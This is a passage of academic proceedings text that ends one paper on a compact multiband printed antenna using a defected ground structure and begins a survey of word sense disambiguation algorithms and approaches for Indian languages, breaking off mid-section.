https://doi.org/10.1007/978-981-16-3346-1_55
684 R. Prabha et al.

1 Introduction

Patch antenna is used for the narrow bandwidth which can be used in advancement
of wireless application. These antennas are low key inexpensive and easy to manu-
facture by utilizing advanced printed circuit technology. They are adaptable with
regard to impedance, resonant frequency, and polarization with one specific mode
are chosen [1]. In [2, 3], a dipole antenna is used to design the different frequency band
antenna. Significance of different shape of slots with a used mobile communications
[4, 5] and different Quasi-Yagi antenna has been used in wireless communications
because of its broadband characteristic and good radiation performance and provide
acceptable absolute gain (0–4.4 dBi) [6]. Different methods have been proposed to
achieve the application of wireless communications using U and L slots [5, 7]. The
achievement of omnidirectional radiation pattern and sustainable antenna gain is
done over the operating bands [8, 9]. The proposed methods have been used for wide
bandwidth [10]. The method of defected ground structure (DGS) has been proved to
be very easy and usable for achieving additional resonant and bandwidth enhance-
ment whereas remove the differently generated frequency [11, 12]. Other practical
approach considered has been involved to elevate the transmission capacity of the
antenna. A thicker substrate may be used as a substitute, but it will result in increasing
the number of energy confined in the substrate [13]. Thus, different method has been
used to achieve the multiband antenna for a particular resonant frequency.
This paper presents the multiband antenna generates the different frequency bands
as DCS (1710–1880 MHz), IEEE802.11b&g WLAN (2.45–2.54 GHz), WiMAX
(3.25–3.95 GHz), IEEE 802.11a WLAN, and IMT (5.1–5.95 GHz) with a simple
design of dual patch, L slots and changed in the ground structure is used to gener-
ated multiband and compactness characteristics. Defected ground structure and
circular slot are used for the improvement of proposed frequency, radiation pattern,
and return loss of presented antenna. The simulation process and fabricated result
show that the effects of the designed antenna are adequate, and it fits for wireless
communications systems. The configuration and data simulation are discussed in
Sects. 2 and 3 as well as the parameters of antenna is carefully examined in this
sections and in Sect. 4 clearly differentiate between the fabricated data and simu-
lated results which satisfies the following operational bands such as DCS/Bluetooth
/WLAN/WiMAX/IMT bands. This further study include the changes in antenna
reconfigurable use of varactor diode, and this single antenna will applicable for
various applications without altering major changes. The enhancement of the gain,
bandwidth and various parameters using Defected Ground Structure (DGS) and also
quell the surface wave propagation. These antennas can work over a compact broad
frequency range.
Low Cost Compact Multiband Printed Antenna … 685

2 Configuration of Antenna and Its Design Procedure

The structure of simulated antenna that have two patch elements and worked at
1.25, 1.75, 2.45, 3.39, 5.1 GHz frequency bands is presented in Fig. 1a, b. The

Fig. 1 a Design of top of


proposed antenna [2],
b design of bottom of
proposed antenna [2]
686 R. Prabha et al.

proposed antenna consists of a main radiator, two sub-patches elements, a microstrip


line feeding, and DGS. The designed antenna is made up of FR-4 substrate having
2.57 mm of and relative permittivity of 4.4, and whole volume is 50 × 50 × 2.57 mm.
Design Procedure
This multiband antenna designed having main radiator, two patch elements with a L
slot and circular slot and have a compact size antenna. The main radiator generates
the one frequency at 2.45 GHz, and the Patch 1 generates triple frequency bands,
and the combination of main radiator, patch 1, and patch 2 generated the frequency
bands at 1.25 GHz, 1.75 GHz, 2.45 GHz, 3.95 GHz, 5.1 GHz with a, respectively,
bandwidth 45 kHz, 68 kHz, 112 kHz, 127 kHz, 240 kHz (Tables 1 and 2).
Using L slot in patch 1 is responsible for generating the triple band, and the
circular slot is used to improve the return loss of antenna. The DGS is one of the
distinctive method to decrease the antenna of size. So, a shape defected on a ground
plane is realized by designed DGS which will create a disturbance on the shielded
current distribution that depends over the dimension and defects shape. The current
flow and input impedance of antenna will be influenced by the distribution at the

Table 1 Features of front face of proposed antenna (in mm) [2]


Lf Wf Wb W0 LP F1 D1 L2
14.6 3 27 50 4 3 12 12
F2 F2 F3 F4 L1 W1 D2 W2
2.2 2.4 2.4 3 12 8 7 8
UL1 Uw1 Ua UL2 UW2 Ub D3 Total volume 50 × 50 × 2.57 mm
8.6 5 −1 3.8 1.25 1 15
D1 D2 D3 r L2 W2 R
12 7 15 2 12 8 2

Table 2 Features of back face of proposed antenna (in mm) [14]


L3 L4 L5 W3 W4 W5 Total Volume 50 × 50 mm
18 18 5 10 5 5

Table 3 Simulated antenna obtained a multiple frequency band


S. No. Resonate frequency Frequency (GHz) Bandwidth (MHz) Return loss (dB)
1 First 1.25 45 −15.37
2 Second 1.75 68 −21.37
3 Third 2.5 112 −16.43
4 Fourth 3.95 127 −23.42
5 Fifth 5.1 240 −13.22
Low Cost Compact Multiband Printed Antenna … 687

influenced current distribution. It may also affect the propagation and stimulation of
electromagnetic waves through the substrate layer [12].

3 Simulation and Measurement Results

Impedance Bandwidth for S11 ≤ 10dB


The final simulation test is done by HFSS software to figure out impedance bandwidth
(for S11 ≤ 10 dB) on size of antenna in various ways. Simulation result of Fig. 2(a)
shows the S11 of the final result using the patch 2 with DGS generated the five
frequency bands as per, respectively, 1.25, 1.75, 2.5, 3.95, 5.1 GHz, but without
DGS, all the frequency bands are shifted. So, it shows the DGS is important for the
good performance of antenna. The simulated antenna obtained multiple frequency
band shows at Table 3. This band covers the different frequency bands such as
DCS/Bluetooth /WLAN/WiMAX/IMT.
Radiation Pattern
The simulated antenna needs to be analyzed do multiple frequency bands at different
radiation pattern 1.25, 1.75, 2.45, 3.95, 5.1 GHz. The proposed simulated antenna of
the H-plane and E-plane radiation pattern has been generated. The radiation pattern
of H-plane and E-plane is very near to omnidirectional that have alike shape between
the proposed simulated antenna, and the total gain of the proposed simulated antenna

Fig. 2a Final simulated return loss [2]


688 R. Prabha et al.

Fig. 2b Radiation pattern at various frequency of simulated antenna (a)1.25 GHz (b)1.73 GHz
(c)2.45 GHz (d)3.9 GHz (e) 5.1 GHz [2]
Low Cost Compact Multiband Printed Antenna … 689

Fig. 2c Simulated gain graph at various frequency of simulated antenna. (a) 1.25 GHz (b) 1.73 GHz
(c) 2.45 GHz (d) 3.9GH (e) 5.1 GHz [2]

is between 2 and 4 dB for multiple bands which is shown in Fig. 2(b). The loss induced
in the FR-4 material is due to variation in the higher resonating frequency.
Simulated Gain
The antenna gain is one of the important parameter to examine the ability of antenna
to radiate more or less in any direction. In this design, the improvement of the
antenna gain is results due to defected ground structure and various slots in antenna.
The proposed antenna provides a gain of −5.27 dB at 1.25 GHz, 2.60 dB at 1.75
GHz, 1.31 dB at 2.5 GHz, 0.377 dB at 3.95 GHz, −0.1419 dB at 5.1 GHz. The
second important parameter of antenna its efficiency which show the how efficient
the antenna works (Fig. 2(c)).

4 Fabricated Multiband Printed Antenna

The presented antenna has different slots and DGS covering the DCS, Bluetooth,
WLAN, WiMAX, IMT. The main structure of designed of top and bottom outlook
of simulated antenna is presented in Fig. 3. L slot and I slot are etched of fabricated
antenna is presented in top and bottom outlook of the fabricated antenna restrain H
shape DGS which shown in figure below. This fabricated structure is very exact view
of the simulated diagram of proposed antenna. This fabricated multiband antenna is
very useful for wireless communication systems. This antenna is also tested using
VNA, and this antenna is also measured with frequency range of 1–6 GHz. Table 4
shows the simulated and fabricated results which differentiate the basic parameters
of simulated and fabricated results.
690 R. Prabha et al.

Fig. 3 Front and back view of fabricated antenna

Table 4 Comparison between parameters of simulated and fabricated results


Parameter Simulated results Fabricated results
Frequency bands 1.25, 1.75, 2.45, 3.95, 5.1 GHz 1.31, 1.8, 2.56, 4.01, 5.26 GHz
Bandwidth 45, 68, 112, 127, 240 MHz 40, 50, 90, 112, 205 MHz
Return loss −15.37, −21.37, −16.43, −23.42, −13.74, −15.6, −13.1, −20.2, −10.1
−13.22
Application DCS, Bluetooth, WLAN, WiMAX, DCS, Bluetooth, WLAN, IMT bands
IMT bands

5 Conclusion

This paper presented the design of compact wideband and multiple band antenna
for the wireless communication systems such as DCS, Bluetooth, WLAN, WiMAX,
IMT bands. The multiband frequency can be individually controlled using the L slots,
I slots, and defected ground structure without influencing the wideband performance.
However, the result of proposed antenna manifest the better performance with regard
to return loss, radiation pattern, gain, and efficiency. The primary features of presented
multiband antenna includes low profile, light weight, and simple to fabricate the
design considering future smaller wireless communications systems. The description
of procedure to designed antenna has been presented in detail. The inclusion of
varactor or tunnel diode to the design of antenna made it reconfigurable which enabled
the various five bands that are independently tuned and electrically connected over
the broad frequency range. Proposed design has been measured and fabricated. The
comparison of measured and simulated results has better association of each other.
Low Cost Compact Multiband Printed Antenna … 691

References

1. Liu, W.-C., Wu, C.-M., & Dai, Y. (2011). Design of triple-frequency microstrip-fed monopole
antenna using defected ground structure. IEEE Transactions on Antennas and Propagation,
59(7).
2. Prabha, R., Tripathi, G. S., & Verma, S. (2016). Design of compact wideband and multi-
band antenna for wireless communication systems. In International conference on advances
in computing, control and communication technology in University of Allahabad, pp 79–85.
3. Abutarboush, H. F., Nilavalan, R., Cheung, S. W., et al. (2012). A reconfigurable wideband and
multiband antenna using dual-patch elements for compact wireless devices. IEEE Transactions
on Antennas and Propagation, 60(1).
4. Lee, Y.-C., & Sun, J.-S. (2009). A new printed antenna for multiband wireless applications.
IEEE Antennas and Wireless Propagation Letters, 8.
5. Huang, C.-Y., & Yu, E.-Z. (2011). A slot-monopole antenna for dual-band WLAN applications.
IEEE Antennas and Wireless Propagation Letters, 10.
6. Wu, Z., Li, L., Chen, X., & Li, K. Dual-band antenna integrating with rectangular mushroom-
like superstrate for WLAN applications. IEEE Antennas and Wireless Propagation Letters.
https://doi.org/10.1109/LAWP.2015.2504558.
7. Yu, Y.-C., & Tarng, J.-H. (2009). A novel modified multiband planar inverted-F antenna. IEEE
Antennas and Wireless Propagation Letters, 8.
8. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U-shaped slots for WLAN/WiMAX applications. IEEE Antennas Wireless
Propagation Letters, 13, 388–391.
9. Chen, H., Yang, X., Yin, Y. Z., Fan, S. T., & Wu, J. J. (2013). Triband planar monopole antenna
with compact radiator for WLAN/WiMAX applications. IEEE Antennas Wireless Propagation
Letters, 12, 1440–1443.
10. Li, B., Hong, J., & Wang, B. (2012). Switched band-notched UWB/dual-band WLAN slot
antenna with inverted S-shaped slots. IEEE Antennas and Wireless Propagation Letters, 11.
11. Moosazadeh, M., & Kharkovsky, S. (2014). Compact and small planar monopole antenna with
symmetrical L- and U shaped slots for WLAN/WiMAX applications. IEEE Antennas and
Wireless Propagation Letters, 13.
12. Colburn, J. S., & Rahmat-Samii, Y. (1999). Patch antennas on externally perforated high
dielectric constant substrates. IEEE Transactions on Antennas and Propagation, 47(12).
13. Kumar, C., & Guha, D. (2012). Nature of cross-polarized radiations from probe-fed circular
microstrip antennas and their suppression using different geometries of defected ground
structure (DGS). IEEE Transactions on Antennas and Propagation, 60(1).
14. Abutarboush, H. F., Nilavalan, R., & Nasr, K. M. (2012). Compact printed multiband antenna
with independent setting suitable for fixed and reconfigurable wireless communication systems.
IEEE Transactions on Antennas and Propagation, 60(8).
A Detailed Analysis of Word Sense
Disambiguation Algorithms
and Approaches for Indian Languages

Archana Sachindeo Maurya and Promila Bahadur

Abstract Word sense disambiguation (WSD) could be a difficult exploration-


research issue in computational etymology that was perceived toward the commence-
ment of the exact interest in machine translation (MT) and artificial intelligence
(AI). WSD is the process of detecting the right meaning of a word with various
senses and requires depth knowledge of various sources. Phrases that contain multi-
functional words, easily present a different parsing structure and provoke different
understanding, and are always referred to as ambiguous. Much effort is required to
resolve this problem using machine translation, but the hard work is still continuing.
Numerous techniques have been used in disambiguation process and executed on
various frames for approximately all dialects. This article presents a detailed anal-
ysis of WSD algorithms and their different approaches adopted by researchers in their
researches for many Indian languages. In this paper, we present forward an exami-
nation of directed, undirected and information-based methodology and calculations
accessible in word sense disambiguation.

Keywords Ambiguity · Word sense disambiguation · Machine translation (MT)

1 Introduction

Worldwide in all chief languages, there are countless vocabularies that have separate
denotations in various frameworks. These words are mentioned to as “ambiguous
words” and existence of these words is referred to as “ambiguity.” Almost all
natural languages continue to suffer from different kinds of ambiguities. The English
do not have any justification for those words. To translate from English to other
languages and languages into English, these ambiguous words should be disam-
biguated correctly for the relevant translation into the target language. Disambigua-
tion of the senses is the process that resolves the problem of ambiguity. Therefore,

A. S. Maurya (B) · P. Bahadur


Institute of Technology, SRMU, Lucknow, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 693
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_56
694 A. S. Maurya and P. Bahadur

WSD is the selection process for the exact suggestion of an ambiguous word existing
in this situation.
The ambiguity issue is the open challenge in the natural language processing
(NLP) field, and WSD is the important task to solve this issue. WSD is a crucial task
for several real-life applications like machinery translation (MT), data extraction
(DE), information recovery (IR), and voice recognition (SR).

1.1 Machine Translation

Machine translation (MT) has been one of the most significant applications of WSD
techniques. Machine translation [1] is a process whereby a language is converted into
another language. The first language is alluded to as the source language, while the
subsequent language is alluded to as the objective language. Common dialects appear
as composed writings and discourse information. This content or vocal information
can be interpreted from the base language to the objective language utilizing machine
translation (MT).

1.2 Ambiguity and Its Classification

Ambiguity refers to the presence of these words in every sentence that has more than
one meaning or interpretation. By studying various works on ambiguity, we have
found that ambiguity in language can be classified into five broad categories which
is designed in Fig. 1.
Detailed information on the various types of ambiguities with its example and
explanation is outlined in the Table 1.

Ambiguity
Types

Lexical Syntactic Pragmatic Semantic Part-of-Speech


Ambiguity Ambiguity Ambiguity Ambiguity Ambiguity

Fig. 1 Different categories of ambiguity


A Detailed Analysis of Word Sense Disambiguation Algorithms … 695

Applications of dis-
ambiguation tech-

Machinery Retrieval of Extraction of


Translation Information Information

Fig. 2 Applications of word sense disambiguation (WSD)

Case 1: If leaves are a verb


Case 2: If leaves is a noun
S S

NP VP NP VP
Train Train

VPP NP NP NP
2 pm leaves

VP PP PP VP
leaves at at ???

Fig. 3 Two cases of parse tree of example 1

2 Word Sense Disambiguation (WSD)

Word sense disambiguation (WSD) is the work of segregating, by thinking about its
unique situation, the best feeling of an uncertain word (a word with different impli-
cations) in a particular utilization of that word. WSD is viewed as an AI-complete
test, a task whose arrangement must be in any event as perplexing as man-made
consciousness’s most requesting issue [Navigli]. This issue subsequently is tackled
during the interpretation from the source language to the objective language. The
technique for finding the specific significance of an equivocal word [5, 6] from a
predefined set of faculties is word sense disambiguation (WSD).
696 A. S. Maurya and P. Bahadur

Table 1 Various sorts of ambiguities, including examples and explanations


S. No. Ambiguity types Definition Example Explanation
1 Lexical It happens when just “Features of a bat” In this phrase word
ambiguity a single word has “bat” has two
more than one meanings either a
importance, or when “mammal, bird” or a
a word can be “cricket bat”
deciphered in
multiple sense [2]
2 Semantic It is likewise alluded Example 1: “The In the principal
ambiguity to as polysemies. It cat is chasing the example, “The cat”
happens when a rat” way to a specific cat,
sentence has more Example 2: “The and in the subsequent
than one way of cat has been example, it implies
comprehension in domesticated for the species “cat”
setting, despite the 10,000 years”
fact that it contains
no lexical or
underlying
equivocalness [3]
3 Pragmatic This happens when “I like you too” This phrase has
ambiguity there are multiple multiple
meanings in a interpretations like
sentence. This can be Interpretation 1: I
ordered as vagueness like you (just as you
in talk, uncertainty in like me)
presuppositions, and Interpretation 2: I
referential like you (like some
equivocalness [4] other person)
4 Syntactic In any expression, “The man saw the This phrase is
ambiguity Syntactic boy with the ambiguous because it
equivocalness exists binoculars” is not clear that the
at whenever point a man used the
sentence can be binoculars to see the
perceived by having boy or boy is using a
at least two than two binocular and man
distinct implications saw him
because of the
request for the words
inside the sentence
[4]
(continued)
A Detailed Analysis of Word Sense Disambiguation Algorithms … 697

Table 1 (continued)
S. No. Ambiguity types Definition Example Explanation
5 Parts-of-speech In such uncertainty, Example: “The red In example, in the
(POS) ambiguity the similar type of a leaves are very first phrase the word
word can be a thing shiny” and “The “leaves” means
or an action word, train leaves at 2 “leaves of a tree”,
plural or solitary, and p.m.” which is a name, and
so on [4] in the second phrase,
“leaves” means
“leaving a train,”
which is a verb. This
means that these
words can be labeled
as different parts of
the discourse in
different phrases

2.1 Applications of Disambiguation Techniques

Machine translation is one of the greatest principal applications of WSD, while it is


common in all natural language processing (NLP) applications in the disambiguation
process. Few applications are described here.
Machinery Translation (MT): WSD process plays an important role in MT for
those words that have more than one translation for different meanings. In the
English-Hindi translation, the word leaves in the English sentences “The leaves
are falling from the tree” and “The train leaves at two pm” could translate to be
either leaf of the tree or departure of the train . However, for solving
this problem, it uses WSD algorithms to find the most appropriate sense of word
leaves.
Retrieval of Information (IR): Solving the problem of ambiguity for any query
is the most significant role in Retrieval of Information (IR). In certain questions,
ambiguity must be overcome. Retrieving information is an individual significant
functions for WSD. WSD algorithms are applied to retrieve related files that are
interrelated to the specific query. Example: web search engines.
Information Extraction (IE): WSD plays a significant role in extraction of infor-
mation and text withdrawal, in many applications disambiguation techniques is
required for precise text analysis. Due to the important role of the senses and
synonyms in IE, semantic analysis is very useful [7].

2.2 Organization of the Paper

The remainder part of the paper is organized from Sects. 3–8 as follows:
698 A. S. Maurya and P. Bahadur

Section 3: This section provides a relative analysis WSD and instructions for
future research.
Section 4: In this section, our proposed work is described.
Section 5: The different approaches of WSD are discussed in detail. Section 5 also
contains the comparison table for different WSD approaches with their benefits
and drawbacks in Table 2.
Section 6: This section presented the summary of WSD approaches and
algorithms with its benefits and drawbacks in Table 2.
Section 7: The review of literature of different WSD approaches used by
researchers in various Indian languages is described here and their comparative
analysis is also presented in Table 3 along with its result accuracy percentage.
Section 8: This section contains the conclusion of the paper.

3 Relative Analysis on WSD and Directions for Future


Research

There is a lot of work done on WSD; some provide the precision of numerous strate-
gies used in different languages, and few give WSD approach surveys. On the basis
of the techniques used, different sources of knowledge used in the disambiguation
classification of WSD algorithms are given [8]. The WSD surveys were conducted
by various researchers and a comprehensive report on algorithms and methods to
solve the problem of uncertainty in a particular language few literature analysis on
WSD based work done by the investigators, their conclusion along with scope for
upcoming researches in details is presented below:
(a) A new algorithm Novel context clustering scheme is presented in the Bayesian
framework. This algorithm is based on the similarities between context pairs.
After that Maximum Entropy model is trained to represent the probability
distribution of context pairs similarities based on heterogeneous features [9].
(b) Naïve Bayesian method of supervised learning approach with high features.
A Forward Sequential Selection algorithm is used to choose the best set of
features. High accuracy obtained by using this method. Part-of-speech can be
checked to determine whether it is useful in the case when we do not have full
enough training data [10].
(c) Hybrid training method is used for better performance over supervised and
unsupervised approach. They found the result that unsupervised method gives
63%, supervised method gives 76% and hybrid method gives 80% accuracy
result. Therefore, they conclude that accuracy is improved in a hybrid approach.
They also said that if the number of target word is disambiguated correctly,
then the system gives 100% accuracy result [11].
(d) Unsupervised Graph-based Approach is used. After processing of the sentence,
it finds the ambiguous words and creates a virtual graph on vectors. From
the labeled nodes of the graph similarity can be calculated. On the basis of
A Detailed Analysis of Word Sense Disambiguation Algorithms … 699

Table 2 Comparison analysis of WSD algorithms and approaches with respect to its benefits and
drawbacks
Approach Algorithm Benefits Drawbacks
Knowledge-based Lesk algorithm The improved Lesk It requires massive
approach algorithm has the knowledge of sources
advantage of being much and original method
quicker than the original cannot be used basically
Lesk algorithm and
having a lower
computational complexity
Semantic The smallest distance When the uniform
similarity between two words are distance problem arises,
semantically related it implies that any two
concepts of the same
paths will have the same
semantic similarity
Preferences for Reduce heavy human The grammatical
selection time cost for manual relationship between
tagging selected words or
phrases can be hard to
establish
Heuristic method Potential issues can It requires knowledge
examine after conducting as well as experiences.
usability testing It is also more
expensive for designers
Supervised approach Decision list This approach produces Over fitting problem
the best results since it occurs it means that
can be used in a series of error appears when a
experiments to arrive at function is too
the desired outcome closely acceptable to a
limited set of data
points
Decision tree Effective method and Maintenance is more
easy to understand complicated and
difficult task
Naïve Bayes’ This is a very simple Problem occurs due to
method and easy to the lack of data
implement. It is also very
fast and requires less
amount of training data
and calculate probability
likelihood
Neural network Ability to work with This method is
incomplete knowledge hardware dependent
and also requires
parallel processing unit
(continued)
700 A. S. Maurya and P. Bahadur

Table 2 (continued)
Approach Algorithm Benefits Drawbacks
Example-based Develop a long-tern Poor potential
Method knowledge holding performance
system
Support vector It uses the kernel trick and Lack of transparency of
machine (SVM) due to the regularization result
parameter over-fitting
problem can be reduced
Unsupervised Context It can be used without any The issue of selecting
approach clustering/word prior experience as a basis suitable document
clustering or developing corpora features to use in
clustering
Co-occurrence Robust features can be Bookmarks cannot be
graph generated by assembling included
small features

similarity value sense label can be selected. This is a new approach for Indian
languages. This new approach can be applied on Indian languages for better
accuracy and adaptability [12].
(e) For the purpose of disambiguation, the Topic Model is used. The most basic
example of a topic model is Latent Dirichlet Allocation (LDA). It is based on the
key hypothesis that the documents deal with a number of topics. Probabilistic
graphical model is presented. The system will use the entire document as
the framework for disambiguation since this model scales linearly with the
number of terms in the context. It runs a better WSD system based on the
leading knowledge on a set of Benchmark datasets. This model may be used
for the supervised WSB method [13].
(f) A detailed survey report presented on various WSD approaches and its benefits
and drawbacks. These approaches are implemented in many languages success-
fully. Finally, they can build a successful WSD algorithm by considering the
following factors: The neighbors of a word of the same meaning seem to be the
same. Some approaches are always run quickly, but with accuracy limitations,
and the majority of those approaches have been successfully implemented for
a variety of languages [14].
(g) Knowledge-based WSD approach is used and there are only four components of
the framework: finally Semantic path exploration, relation extraction, similarity
calculation and semantic space exploration are performed. On the other three
datasets, this method outperforms all other schemes. This method performs
well on nouns and verbs in terms of POS disambiguation. These nouns and
verbs are the main component of any sentence. The performance of noun disam-
biguation is equal to that of the best supervised method, and the performance
of verb disambiguation is superior to all other knowledge-based systems [15].
(h) The dynamic programming is used to solve by breaking the problem down into
a series of smaller problems, and dynamic programming (DP) is used to find
A Detailed Analysis of Word Sense Disambiguation Algorithms … 701

Table 3 Summary of WSD techniques used in different Indian languages with accuracy percentage
Used algorithm type Author Year WSD language Performance in %
Knowledge-based Haroon [38] 2010 Malayalam 81.3%
approach
Modified Lesk’s Kumar and 2011 Punjabi 75%
algorithm Khanna [39]
Unsupervised learning Das and Sarkar 2013 Bengali 60%
method with [40]
graph-based approach
Decision list Parameswarappa 2013 Kannada Satisfactory
et al. [41]
Genetic algorithm Kumari and Singh 2013 Hindi 91.6%
[42]
Decision tree based Sivaji et al. [27] 2014 Manipuri 71.75%
WSD system
Support vector machine Anand Kumar 2014 Tamil 91.6%
et al. [43]
Naïve Bayes Pal et al. [44] 2015 Bengali 80–85%
classification
Context similarity Sankar et al. [45] 2016 Malayalam 72%
unsupervised approach
Genetic algorithm Vaishnav [46] 2017 Gujarati Satisfactory
Lesk algorithm Shashank and 2017 Kannada Satisfactory
Kallimani [47]
Naïve Bayes method pal Singh and 2018 Punjabi 81%-89% for both
Kumar [48] model
Naïve Bayes approach Borah et al. [49] 2019 Assamese 91.11%
Knowledge-based Vaishnav and Sajja 2019 Gujarati Satisfactory
approach [50]
Deep learning neural pal Singh and 2020 Punjabi 91–97%
network Kumar[51]

the optimal subset that contains the most distinct set in the shortest amount of
time, while maintaining the same or better accuracy than the original set. This
algorithm can be used for any ensemble approach and real world examples and
it can even be combined with other ensemble methods like boosting. DPED can
even be integrated with bagging and boosting algorithms to enhance the
efficiency on big data sets and multi-classes [16].
(i) They create a conceptual system that bolstered the likelihood of events of occa-
sions of different nature and their potential effect. The conceptual analysis is
often applied in various other case studies consisting of multiple sources. As a
result, taking advantage of the sources is very difficult. A quantitative review
702 A. S. Maurya and P. Bahadur

technique will help to enhance it. Further advancement is justified by the asso-
ciation between both the size of acuity and taxonomy & management. Rele-
vant sources are often imagine by assigning weights to different interpretations
on the idea of scenario reliability [17].
(j) SENS EMBERT is an effective method in both English and other multilingual WSD
tasks. Going forward, they will work to cover PO tags (verbs, adjectives and
adverbs) by tapping into other sources of knowledge. Sense embeddings can
also be used to create high-quality silver data for WSD in multiple languages
[18].
(k) Word in Context (WiC) model is used for all. They presented ARES, the semi-
supervised approach for producing embedding of senses in English and across
different languages. ARES can couple the information within the sense anno-
tated corpora that automatically created by means of a cluster-based algorithm
and resulting in high-quality latent representations of the concepts within a
lexical knowledge base. Working forward they will exploit this information
obtained by the embedding to other downstream in multi-lingual semantics
and cross-lingual semantic parsing [19].

4 Proposed Work

We inferred from this comparative evaluation that we can apply such algorithms
in multiple languages on various different data sets. The size of the data set can
be different as well. There are very few Indian languages in which WSD experi-
ments implemented, such as Hindi, Marathi, Gujarati, Bengali, Punjabi, Kannada,
etc. Our approach would be providing a better result for solving parts-of-speech
(POS) ambiguity between an English-to-Sanskrit language [20] machine translation
using a supervised learning method.

Example
1. Train leaves at two p.m. (a verb)
2. Leaves are falling from the tree. (a noun)

The parse tree for the sentence “Train leaves at 2 pm” is presented in figure. It
will takes two cases.
The sentence is grammatically correct, but, while morphological analysis the
ambiguity will be in terms of treating “leaves” as noun or verb by the system due
to information provided by bilingual lexicon/dictionary. Morphological analysis is a
method for identification and investigation of the total set of all possible relationships
contained in a list and selection of most appropriate word from the entire possible
word list.
A Detailed Analysis of Word Sense Disambiguation Algorithms … 703

5 WSD Approaches

There are several approaches in WSD, but mainly three approaches that depend on
the availability of the dataset. These approaches are figures in Fig. 4.

5.1 An Approach Focused on Information

This approach is based on the several sources of knowledge like machine readable
dictionaries, thesaurus, inventories etc. Commonly used dictionaries in this explo-
ration field is WordNet [21]. Normally, four main methods of information-based
approaches are popular.
(a) LESK Algorithm: The Lesk algorithm is the vocabulary-based method and
was introduced by Michael Lesk in 1986 [22, 23]. Which further means iden-
tifying the correct sense one word at a time. This algorithm determines the
correct definitions of all words in context by using idea overlap. It runs faster,
which reduces the computational time complexity.
(b) Semantic Similarity: This approach is based on the knowledge-based methods
and is used to resolving the WSD problem. This algorithm defines the relation-
ship between words [14]. Semantic similarity can be to quantify uncertainty,
as well as to check patterns for continuity and coherence [24]. Information
quality, features, path duration, and hybrid measures are the four categories
that all measures fall under.

Fig. 4 Disambiguation of word senses: various approaches (WSD)


704 A. S. Maurya and P. Bahadur

(c) Selectional Preferences: This method is used to find the information regarding
potential relationships between different categories of words and also denotes
to the familiar sense on the basis of source of information. These partialities
are given in terms of semantic classes instead of a single word.
(d) Heuristic Method: This method comes under the knowledge-based methods.
To determine the correct meaning of an ambiguous expression, linguistic
properties are used. Three methods are used for estimation of WSD systems:
Most Frequent Sense searches for all possible meanings of a given ambiguous
expression. A word’s most frequent sense (MFS) can be measured in a variety
of ways. WordNet provides a frequency count for each of a word’s senses.
One Sense per Dialog says that a word’s meaning will be preserved through
all occurrences in any given text. It has an effect on classification likelihood,
and it can also be overridden if there are good local evidence. One sense per
Association estimate is similar to that of One Sense per Discourse estimation,
with the exception that it assumes that closer words offer stronger and clear
signals to the same word.
(e) Walker’s Algorithm: This algorithm is based on the thesaurus. This algorithm
works on finding the synonyms of ambiguous word and calculates the result
for each sense. It will add 1 if the meaning of the synonym is identical to the
word. This method gives the highest result because it relies on synonyms.

5.2 Supervised-Learning Approach

This method is applied for WSD systems that uses machine learning techniques to
learn from sense-annotated data that has been manually generated. After learning
from the training set results, the training set will be used to find the goal. The
target word tags are manually generated using the dictionary. In contrast to the other
methods, this one shows the best results. This approach uses the following methods:
(a) Decision List: The list created from “if-then-else” rules is a decision list [25–
27]. Training sets are used to generate new parameters like feature value, senses,
and score. On the basis of decreasing score, final order of rule is generated,
and results in the creation of decision list. First of all calculate the occurrences
of any word and its feature vector is used for the creation of decision list.
Example of Decision list to find a person is eligible for blood donation or not.

If age > 8 and weight > 50


then
The person is eligible for blood donation.
else
The person is not eligible for blood donation.
A Detailed Analysis of Word Sense Disambiguation Algorithms … 705

Fig. 5 Decision tree


example

(b) Decision Tree: A decision tree is a visual representation for the outcomes of
a sequence of connected choices. It allows a person to compare and contrast
potential actions using a yes–no tree based on their various characteristics such
as costs, probabilities, and benefits. The representation of classification rules
is achieved using a decision tree [28–30], and these rules recursively distribute
the training data set.
Figure 5 shows an example of a decision tree used to determine a person’s
eligibility for blood donation.

(iii) Naïve Bayes: It’s a Bayes’ Theorem-based classification methodology. This


theorem implies that the existence of one feature in a class has no bearing on
the presence of another feature in that class. The Bayes’ rule is used in this
algorithm to find the conditional probability features in a given class [31–33].
The conditional probability of each meaning of a term, as well as the features
in that context, is calculated using this algorithm. In that context, the highest
value reflects the most important meaning.

The probability value P can be computed with the help of subsequent formula:

S = arg max P( f 1 , f 2 , . . . f x ). (1)


Si eSensesD(w)
 
P f 1 , f 2 , . . . . . . Sf xi P(Si )
S = arg max   (2)
Si eSensesD(w) P f1 , f2 , . . . f j
m  
fj
S = arg max P(Si ) P (3)
Si eSensesD(w) j=1
Si

where S i is the sense of a word w, f j is the given feature and x the total number of
extracted features.
This model is simple to use, and implement, especially with large data sets.
(iv) Neural Networks: Artificial neurons are used to process data in this model
[34–37]. The training data set is partitioned into non-overlapping sets using
706 A. S. Maurya and P. Bahadur

this approach, with inputs in the form of pairs of features. The connection
weights that come from the new pairs are balanced to get the desired perfor-
mance. Words are interpreted as nodes in neural networks, these nodes trigger
semantically linked thoughts.
The following formula [38] can be used to calculate the input for the general
model of artificial neural network:

Yin = x1 .w1 + x2 .w2 + . . . xm .wm (4)

i.e., total input


m
yin = xm .wm (5)
i

The result can be determine after using the stimulation function on the total
input value.

y = F(yim ) (6)

(v) Example-Based Learning: All examples will be stored in memory, and new
examples will be added to the model. The description of this memory will be
considered. In this model, the K-Nearest neighbor (KNN) method is widely
used. The KNN algorithm uses feature similarity to expect new data point
values and these data points will be assigned a new value on the basis of how
closely it is related to the point in the training set.
(vi) Support Vector Machine (SVM): The SVM centered methodology is
constructed on the mathematical learning theory concept of structural risk
minimization. The main objective of this strategy is to use a higher margin
to distinguish positive and negative cases. Margin is defined as the distance
between the hyperplane and the nearest positive or negative example. Both
forms of examples, which are the most similar to the hyperplane, are called
support vector.

5.3 Unsupervised-Learning Approach

According to [39] this algorithm does not necessarily require a training corpus or a
considerable computation time. Using this approach, we can easily get the unlabeled
data from the computer. Following 3 approaches comes under this category:
(a) Context Clustering: This method depends on the grouping techniques and
groups are represented on the basis of similarity matrix or context vectors.
These forms a group called clusters and clusters are used for the determination
A Detailed Analysis of Word Sense Disambiguation Algorithms … 707

